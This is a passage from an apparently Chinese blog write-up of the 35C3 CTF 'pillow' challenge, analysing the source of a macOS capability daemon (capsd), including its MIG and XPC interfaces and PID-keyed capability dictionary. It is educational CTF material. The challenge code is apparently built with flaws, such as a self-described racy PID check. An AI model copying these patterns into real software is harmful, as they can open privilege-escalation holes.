[%&#123;public&#125;s]&quot;</span>, len, buf);</span><br></pre></td></tr></table></figure><p>日志输出：</p><p><img src="/2022/01/35c3ctf_pillow/image-20220106234900069.png" alt="image-20220106234900069"></p></li></ul><h2 id="三、代码研究">三、代码研究</h2><h3 id="1-capsd">1. capsd</h3><p>我们首先简单看看 MIG 中的接口。</p><h4 id="a-capsd-defs">a. capsd.defs</h4><p>代码很短：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">subsystem capsd <span class="number">733100</span>;</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach/std_types.defs&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach/mach_types.defs&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach_debug/mach_debug_types.defs&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> <span class="string">&quot;../common/types.h&quot;</span>;</span><br><span class="line"></span><br><span class="line">type string = c_string[*:<span class="number">1024</span>];</span><br><span class="line"></span><br><span class="line"><span class="function">routine <span class="title">grant_capability</span><span class="params">(server: <span class="type">mach_port_t</span>; ServerAuditToken token: <span class="type">audit_token_t</span>; target: <span class="type">audit_token_t</span>; operation: string; arg: string)</span></span>;</span><br><span class="line"><span class="function">routine <span class="title">has_capability</span><span class="params">(server: <span class="type">mach_port_t</span>; pid: <span class="type">int</span>; operation: string; arg: string; out result: <span class="type">int</span>)</span></span>;</span><br></pre></td></tr></table></figure><p>可以看到这里只定义了两个函数 <code>grant_capability</code> 和 <code>has_capability</code> 函数。这两个函数可以被 Client 远程调用至 Server 上的实现。</p><h4 id="b-capsd-c">b. capsd.c</h4><h5 id="1-capsd-main-函数">1) capsd main 函数</h5><ul><li><p>初始时，capsd 会先输出一条信息，以说明当前守护进程已经开始执行：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">os_log</span>(OS_LOG_DEFAULT, <span class="string">&quot;net.saelo.capsd starting&quot;</span>);</span><br></pre></td></tr></table></figure><p>但这条信息并没有那么方便读取到。我们首先得先从 launchd 的日志中获取到 capsd 的 pid 号：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">log</span> show --predicate <span class="string">&#x27;processID == 0&#x27;</span> --last 1h | grep <span class="string">&quot;capsd&quot;</span></span><br><span class="line"></span><br><span class="line">[...]</span><br><span class="line"></span><br><span class="line">2022-01-05 17:00:03.199483+0800 0x7c716    Default     0x0                  1      0    launchd: [net.saelo.capsd:] This service is defined to be constantly running and is inherently inefficient.</span><br><span class="line">2022-01-05 17:00:03.199525+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd:] internal event: WILL_SPAWN, code = 0</span><br><span class="line">2022-01-05 17:00:03.199537+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd:] service state: spawn scheduled</span><br><span class="line">2022-01-05 17:00:03.199539+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd:] service state: spawning</span><br><span class="line">2022-01-05 17:00:03.199626+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd:] launching: speculative</span><br><span class="line">2022-01-05 17:00:03.200004+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd [32099]:] xpcproxy spawned with pid 32099</span><br><span class="line">2022-01-05 17:00:03.200033+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd [32099]:] internal event: SPAWNED, code = 0</span><br><span class="line">2022-01-05 17:00:03.200035+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd [32099]:] service state: xpcproxy</span><br><span class="line">2022-01-05 17:00:03.200138+0800 0x7c716    Default     0x0                  1      0    launchd: [system:] Bootstrap by launchctl[32098] <span class="keyword">for</span> /Users/kiprey/Desktop/CTF/35c3ctf/pillow/distrib/System/Library/LaunchDaemons/net.saelo.capsd.plist succeeded (0: )</span><br><span class="line">2022-01-05 17:00:03.200197+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd [32099]:] internal event: SOURCE_ATTACH, code = 0</span><br><span class="line">2022-01-05 17:00:03.202699+0800 0x7c8af    Default     0x0                  1      0    launchd: [system/net.saelo.capsd [32099]:] service state: running</span><br><span class="line">2022-01-05 17:00:03.202725+0800 0x7c8af    Default     0x0                  1      0    launchd: [system/net.saelo.capsd [32099]:] internal event: INIT, code = 0</span><br><span class="line">2022-01-05 17:00:03.202730+0800 0x7c8af    Default     0x0                  1      0    launchd: [system/net.saelo.capsd [32099]:] Successfully spawned capsd[32099] because speculative</span><br></pre></td></tr></table></figure><p>我们可以很容易的获取到 capsd 的 pid 为 <code>32099</code>，因此我们继续执行以下命令来查看该程序的 log：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">log</span> show --predicate <span class="string">&#x27;processID == 32099&#x27;</span> --last 1h</span><br><span class="line"></span><br><span class="line">Filtering the <span class="built_in">log</span> data using <span class="string">&quot;processIdentifier == 32099&quot;</span></span><br><span class="line">Skipping info and debug messages, pass --info and/or --debug to include.</span><br><span class="line">Timestamp                       Thread     Type        Activity             PID    TTL  </span><br><span class="line">2022-01-05 17:00:03.205538+0800 0x7c8bc    Default     0x0                  32099  0    capsd: net.saelo.capsd starting</span><br><span class="line">--------------------------------------------------------------------------------------------------------------------</span><br><span class="line">Log      - Default:          1, Info:                0, Debug:             0, Error:          0, Fault:          0</span><br><span class="line">Activity - Create:           0, Transition:          0, Actions:           0</span><br></pre></td></tr></table></figure><p>可以看到成功读取到 capsd 的输出。</p></li><li><p>接下来，capsd 会使用默认参数，生成一个 <strong>空的 CFDictionary 字典</strong>：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">capabilities_by_pid = <span class="built_in">CFDictionaryCreateMutable</span>(kCFAllocatorDefault, <span class="number">0</span>, &amp;kCFTypeDictionaryKeyCallBacks, &amp;kCFTypeDictionaryValueCallBacks);</span><br></pre></td></tr></table></figure><blockquote><p>需要注意的是，<strong>这个字典是全局变量</strong>，因此它会在其他上下文中被使用。</p></blockquote></li><li><p>之后，capsd 获取 bootstrap port，并把反向 DNS 样式的名称 <strong>“net.saelo.capsd”</strong> 注册进 bootstrap 中，以备其他进程所使用：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">mach_port_t</span> bootstrap_port, service_port;</span><br><span class="line"><span class="built_in">task_get_special_port</span>(<span class="built_in">mach_task_self</span>(), TASK_BOOTSTRAP_PORT, &amp;bootstrap_port);</span><br><span class="line"></span><br><span class="line">kr = <span class="built_in">bootstrap_check_in</span>(bootstrap_port, <span class="string">&quot;net.saelo.capsd&quot;</span>, &amp;service_port);</span><br><span class="line"><span class="built_in">ASSERT_MACH_SUCCESS</span>(kr, <span class="string">&quot;bootstrap_check_in&quot;</span>);</span><br></pre></td></tr></table></figure><p>接下来这步稍微复杂了一点，它指定 <code>capsd_server</code> 函数来处理 service_port 中即将到来的 mach message，即将 service_port 中的事件<strong>分发到</strong> <code>capsd_server</code> 中进行处理；之后开始异步执行 mach 事件分发操作：</p><blockquote><p>需要注意的是这里使用 <code>MIG</code> 来生成其余的 mach 信息交互代码，隐藏了 Mach 通信的内部细节。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">dispatch_source_t</span> source = <span class="built_in">dispatch_source_create</span>(DISPATCH_SOURCE_TYPE_MACH_RECV, service_port, <span class="number">0</span>, <span class="built_in">dispatch_get_main_queue</span>());</span><br><span class="line"></span><br><span class="line"><span class="built_in">dispatch_source_set_event_handler</span>(source, ^&#123;</span><br><span class="line">    <span class="built_in">dispatch_mig_server</span>(source, MAX_MSG_SIZE, capsd_server);</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line"><span class="built_in">dispatch_resume</span>(source);</span><br></pre></td></tr></table></figure></li><li><p>capsd 除了建立 mach message server 以外，它还建立了一个 XPC Service：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Set up XPC service</span></span><br><span class="line"><span class="type">xpc_connection_t</span> service = <span class="built_in">xpc_connection_create_mach_service</span>(<span class="string">&quot;net.saelo.capsd.xpc&quot;</span>, <span class="literal">NULL</span>, XPC_CONNECTION_MACH_SERVICE_LISTENER);</span><br><span class="line"><span class="built_in">xpc_connection_set_target_queue</span>(service, <span class="built_in">dispatch_get_main_queue</span>());</span><br><span class="line"></span><br><span class="line"><span class="built_in">xpc_connection_set_event_handler</span>(service, ^(<span class="type">xpc_object_t</span> connection) &#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">xpc_get_type</span>(connection) == XPC_TYPE_CONNECTION) &#123;</span><br><span class="line">        <span class="built_in">xpc_connection_set_target_queue</span>(connection, <span class="built_in">dispatch_get_main_queue</span>());</span><br><span class="line">        <span class="built_in">xpc_connection_set_event_handler</span>(connection, ^(<span class="type">xpc_object_t</span> msg) &#123;</span><br><span class="line">            [XPC_message_event_handler]</span><br><span class="line">        &#125;);</span><br><span class="line">        <span class="built_in">xpc_connection_resume</span>(connection);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="type">char</span>* description = <span class="built_in">xpc_copy_description</span>(connection);</span><br><span class="line">        <span class="built_in">os_log</span>(OS_LOG_DEFAULT, <span class="string">&quot;Received unexpected event: %&#123;public&#125;s\n&quot;</span>, description);</span><br><span class="line">        <span class="built_in">free</span>(description);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;);</span><br><span class="line"><span class="built_in">xpc_connection_resume</span>(service);</span><br></pre></td></tr></table></figure><p>这个 XPC Service 实际处理 XPC message 的方式如下所示。</p><p>根据代码描述可以得知，<strong>传入的 XPC Message 应该是一个字典类型 <code>xpc_dictionary</code></strong>，且有 <code>action</code>(uint64_t)、<code>pid</code>(int64_t)、<code>operation</code> (string)以及 <code>argument</code>(string) 四个 key 值。而返回给调用方的是一个只有 <code>success</code> 键值对的字典。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="built_in">xpc_get_type</span>(msg) == XPC_TYPE_DICTIONARY) &#123;</span><br><span class="line">    <span class="type">xpc_object_t</span> reply = <span class="built_in">xpc_dictionary_create_reply</span>(msg);</span><br><span class="line">    <span class="keyword">if</span> (!reply)</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> action = <span class="built_in">xpc_dictionary_get_uint64</span>(msg, <span class="string">&quot;action&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (action == ACTION_GRANT_CAPABILITY) &#123;</span><br><span class="line">        <span class="type">audit_token_t</span> creds;</span><br><span class="line">        <span class="comment">// TODO check xpc_dictionary_set_audit_token</span></span><br><span class="line">        <span class="built_in">xpc_dictionary_get_audit_token</span>(msg, &amp;creds);</span><br><span class="line">        <span class="type">pid_t</span> target = <span class="built_in">xpc_dictionary_get_int64</span>(msg, <span class="string">&quot;pid&quot;</span>);</span><br><span class="line">        <span class="type">const</span> <span class="type">char</span>* operation = <span class="built_in">xpc_dictionary_get_string</span>(msg, <span class="string">&quot;operation&quot;</span>);</span><br><span class="line">        <span class="type">const</span> <span class="type">char</span>* argument = <span class="built_in">xpc_dictionary_get_string</span>(msg, <span class="string">&quot;argument&quot;</span>);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (operation &amp;&amp; argument) &#123;</span><br><span class="line">            <span class="built_in">xpc_dictionary_set_bool</span>(reply, <span class="string">&quot;success&quot;</span>, <span class="built_in">grant_capability_internal</span>(creds, target, operation, argument) == KERN_SUCCESS);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="built_in">xpc_dictionary_set_bool</span>(reply, <span class="string">&quot;success&quot;</span>, <span class="literal">false</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="keyword">else</span> <span class="keyword">if</span> (action == ACTION_HAS_CAPABILITY) &#123;</span><br><span class="line">        <span class="type">pid_t</span> target = <span class="built_in">xpc_dictionary_get_int64</span>(msg, <span class="string">&quot;pid&quot;</span>);</span><br><span class="line">        <span class="type">const</span> <span class="type">char</span>* operation = <span class="built_in">xpc_dictionary_get_string</span>(msg, <span class="string">&quot;operation&quot;</span>);</span><br><span class="line">        <span class="type">const</span> <span class="type">char</span>* argument = <span class="built_in">xpc_dictionary_get_string</span>(msg, <span class="string">&quot;argument&quot;</span>);</span><br><span class="line">        <span class="built_in">xpc_dictionary_set_bool</span>(reply, <span class="string">&quot;success&quot;</span>, <span class="built_in">has_capability_internal</span>(target, operation, argument));</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="built_in">xpc_dictionary_set_bool</span>(reply, <span class="string">&quot;success&quot;</span>, <span class="literal">false</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">xpc_connection_send_message</span>(connection, reply);</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">xpc_get_type</span>(msg) != XPC_TYPE_ERROR || msg != XPC_ERROR_CONNECTION_INVALID) &#123;</span><br><span class="line">        <span class="type">char</span>* description = <span class="built_in">xpc_copy_description</span>(msg);</span><br><span class="line">        <span class="built_in">os_log</span>(OS_LOG_DEFAULT, <span class="string">&quot;Received unexpected event on connection: %&#123;public&#125;s\n&quot;</span>, description);</span><br><span class="line">        <span class="built_in">free</span>(description);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>handler 会根据传入的 xpc 请求来进行不同的操作：<strong>获取权限</strong>或<strong>查看当前是否有权限</strong>。</p><p>这里记录下 handler 调用的两个函数：<code>grant_capability_internal</code> 和 <code>has_capability_internal</code>。</p></li></ul><h5 id="2-has-grand-capability-函数">2) has/grand_capability 函数</h5><p><code>has_capability</code> 和 <code>grand_capability</code> 函数没有在 <code>capsd.c</code> 中直接调用，它们是先前声明的 MIG 远程调用接口的实现。</p><p>可以看到，最终这两个函数也是调用上面刚刚提到的 <code>*_internal</code> 函数，因此实际上 capsd 中的 mach server 和 xpc service 最终提供给 client 的接口都是这两个接口，一模一样。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">grant_capability</span><span class="params">(<span class="type">mach_port_t</span> server, <span class="type">audit_token_t</span> token, <span class="type">pid_t</span> target, <span class="type">const</span> <span class="type">char</span>* op, <span class="type">const</span> <span class="type">char</span>* arg)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">grant_capability_internal</span>(token, target, op, arg);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">has_capability</span><span class="params">(<span class="type">mach_port_t</span> server, <span class="type">pid_t</span> pid, <span class="type">const</span> <span class="type">char</span>* op, <span class="type">const</span> <span class="type">char</span>* arg, <span class="type">int</span>* out)</span> </span>&#123;</span><br><span class="line">    *out = <span class="built_in">has_capability_internal</span>(pid, op, arg);</span><br><span class="line">    <span class="keyword">return</span> KERN_SUCCESS;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h5 id="3-get-or-create-capabilities-for-pid-函数">3) get_or_create_capabilities_for_pid 函数</h5><p>该函数是两个 internal 函数的辅助函数。还记得先前提到的一个<strong>在 main 函数进行初始化</strong>的<strong>字典</strong>类型<strong>全局变量 capabilities_by_pid</strong> 么？这里将会对它进行查询或添加操作。</p><p>这个函数代码很短，先把代码贴出来：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">CFMutableDictionaryRef <span class="title">get_or_create_capabilities_for_pid</span><span class="params">(<span class="type">pid_t</span> pid)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// Check if the process exists. This is racy though...</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">kill</span>(pid, <span class="number">0</span>) != <span class="number">0</span> &amp;&amp; errno == ESRCH) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">NULL</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 创建一个 CFNumber 类型的 key 值引用，且该值初始化为传入的 pid</span></span><br><span class="line">    CFNumberRef key = <span class="built_in">CFNumberCreate</span>(kCFAllocatorDefault, kCFNumberSInt32Type, &amp;pid);</span><br><span class="line">    <span class="comment">// 创建一个 CF 字典类型的引用，注意这只是一个引用</span></span><br><span class="line">    CFMutableDictionaryRef capabilities;</span><br><span class="line">    <span class="comment">/* 判断：这个 key 值是否已经在 capabilities_by_pid 字典中了（即先前是否已经添加过该 pid 了）</span></span><br><span class="line"><span class="comment">       如果存在，则将该 key 值所对应的 value （也是一个字典类型的值）的引用存入 capabilities 变量中 */</span></span><br><span class="line">    <span class="keyword">if</span> (!<span class="built_in">CFDictionaryGetValueIfPresent</span>(capabilities_by_pid, key, (<span class="type">const</span> <span class="type">void</span>**)&amp;capabilities)) &#123;</span><br><span class="line">        <span class="comment">// 如果发现该 pid 不存在与全局字典中，则手动建立一个 value</span></span><br><span class="line">        capabilities = <span class="built_in">CFDictionaryCreateMutable</span>(kCFAllocatorDefault, <span class="number">0</span>, &amp;kCFTypeDictionaryKeyCallBacks, &amp;kCFTypeDictionaryValueCallBacks);</span><br><span class="line">        <span class="comment">// 并将该 key value 键值对存入全局字典里</span></span><br><span class="line">        <span class="built_in">CFDictionaryAddValue</span>(capabilities_by_pid, key, capabilities);</span><br><span class="line">        <span class="built_in">CFRelease</span>(capabilities);</span><br><span class="line">        <span class="comment">// 这里稍微有点难懂，不过整体的意思是，注册一个 handler，当子进程退出时，自动释放那些存入的键值对</span></span><br><span class="line">        <span class="type">dispatch_source_t</span> source = <span class="built_in">dispatch_source_create</span>(DISPATCH_SOURCE_TYPE_PROC, pid, DISPATCH_PROC_EXIT, <span class="built_in">dispatch_get_main_queue</span>());</span><br><span class="line">        <span class="built_in">dispatch_source_set_event_handler</span>(source, ^&#123;</span><br><span class="line">            <span class="built_in">os_log</span>(OS_LOG_DEFAULT, <span class="string">&quot;cleaning up capabilities for dead client %d&quot;</span>, pid);</span><br><span class="line"></span><br><span class="line">            <span class="built_in">CFDictionaryRemoveValue</span>(capabilities_by_pid, key);</span><br><span class="line"></span><br><span class="line">            <span class="built_in">CFRelease</span>(key);</span><br><span class="line"></span><br><span class="line">            <span class="built_in">dispatch_source_cancel</span>(source);</span><br><span class="line">            <span class="built_in">dispatch_release</span>(source);</span><br><span class="line">        &#125;);</span><br><span class="line">        <span class="built_in">dispatch_resume</span>(source);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="comment">// 如果有，则无事发生，将取出来对应于该 pid 的 capabilities 字典返回给调用者</span></span><br><span class="line">        <span class="built_in">CFRelease</span>(key);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 总而言之，这里一定会返回一个全局字典中对应于传入 key 值的一个 value 字典</span></span><br><span class="line">    <span class="keyword">return</span> capabilities;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>初始时，该函数将判断<strong>传入的 pid 所在进程是否仍然存活</strong>。如果目标进程已经死亡，则没意义再创建一个 capability 字典了。</p><blockquote><p>向某个进程发送 <strong>0 号信号</strong>时，<strong>不会发送任何信号</strong>，但是会进行错误检查。</p><p>这里的 ESRCH 是 <strong>进程不存在</strong>的错误代码。如果指定 pid 不存在则 kill -0 将会返回 ESRCH。</p></blockquote><p>如果存活，则判断<strong>全局字典中是否存在目标 pid 的键值对</strong>。如果存在则将其 value <strong>引用</strong>返回给调用者，否则新建一个**(pid, capabilities)键值对**，并将其插入至全局字典中，最后返回 value 的<strong>引用</strong>。</p><h5 id="4-grant-capability-internal-函数">4) grant_capability_internal 函数</h5><p>grant_capability_internal 函数应该算是整个 capsd 的核心函数，不过代码也很短：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">grant_capability_internal</span><span class="params">(<span class="type">audit_token_t</span> token, <span class="type">pid_t</span> target, <span class="type">const</span> <span class="type">char</span>* op, <span class="type">const</span> <span class="type">char</span>* arg)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// 向 sandbox 请求 token 所对应进程中，指定 op 和 arg 所请求的权限</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">sandbox_check_by_audit_token</span>(token, op, SANDBOX_CHECK_NO_REPORT, arg, <span class="literal">NULL</span>, <span class="literal">NULL</span>, <span class="literal">NULL</span>) == <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="comment">// 权限请求成功，则获取或创建一个对应于传入 pid 的 capabilities 字典</span></span><br><span class="line">        CFMutableDictionaryRef capabilities = <span class="built_in">get_or_create_capabilities_for_pid</span>(target);</span><br><span class="line">        <span class="keyword">if</span> (!capabilities)</span><br><span class="line">            <span class="keyword">return</span> KERN_FAILURE;</span><br><span class="line">        <span class="comment">// 将传入的 op 和 arg 全转换成 CFStringRef 形式</span></span><br><span class="line">        CFStringRef operation = <span class="built_in">CFStringCreateWithCString</span>(kCFAllocatorDefault, op, kCFStringEncodingASCII);</span><br><span class="line">        CFStringRef argument = <span class="built_in">CFStringCreateWithCString</span>(kCFAllocatorDefault, arg, kCFStringEncodingASCII);</span><br><span class="line">        <span class="comment">// 尝试获取 capabilities 中，键 operation 对应的值 arguments 集合</span></span><br><span class="line">        CFMutableSetRef arguments;</span><br><span class="line">        <span class="keyword">if</span> (!<span class="built_in">CFDictionaryGetValueIfPresent</span>(capabilities, operation, (<span class="type">const</span> <span class="type">void</span>**)&amp;arguments)) &#123;</span><br><span class="line">            <span class="comment">// 如果没有，则新建一个 arguments 集合，并将其插入进 capabilities中</span></span><br><span class="line">            arguments = <span class="built_in">CFSetCreateMutable</span>(kCFAllocatorDefault, <span class="number">0</span>, &amp;kCFTypeSetCallBacks);</span><br><span class="line">            <span class="built_in">CFDictionaryAddValue</span>(capabilities, operation, arguments);</span><br><span class="line">            <span class="built_in">CFRelease</span>(arguments);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 将新的 arguments 插入进 capabilities 里 operation 键所对应的 arguments 集合中</span></span><br><span class="line">        <span class="built_in">CFSetSetValue</span>(arguments, argument);</span><br><span class="line"></span><br><span class="line">        <span class="built_in">CFRelease</span>(operation);</span><br><span class="line">        <span class="built_in">CFRelease</span>(argument);</span><br><span class="line">        <span class="keyword">return</span> KERN_SUCCESS;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> KERN_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>在这里，我们已经可以理清所有使用到的数据结构：</p><ul><li><p>Server 接收到的 XPC 消息结构</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;action&quot;</span> <span class="punctuation">:</span> ACTION_GRANT_CAPABILITY / ACTION_HAS_CAPABILITY<span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;operation&quot;</span> <span class="punctuation">:</span> <span class="string">&quot;str type operation&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;argument&quot;</span> <span class="punctuation">:</span> <span class="string">&quot;str type argument&quot;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure></li><li><p>Server 返回的信息结构</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">  <span class="attr">&quot;success&quot;</span> <span class="punctuation">:</span> <span class="number">0</span>/<span class="number">1</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure></li><li><p>全局字典 <code>capabilities_by_pid</code> 结构：</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    pid_1 <span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">        operation_1 <span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">          argument_1，</span><br><span class="line">          argument_2，</span><br><span class="line">          ...</span><br><span class="line">      <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">      operation_2 <span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">          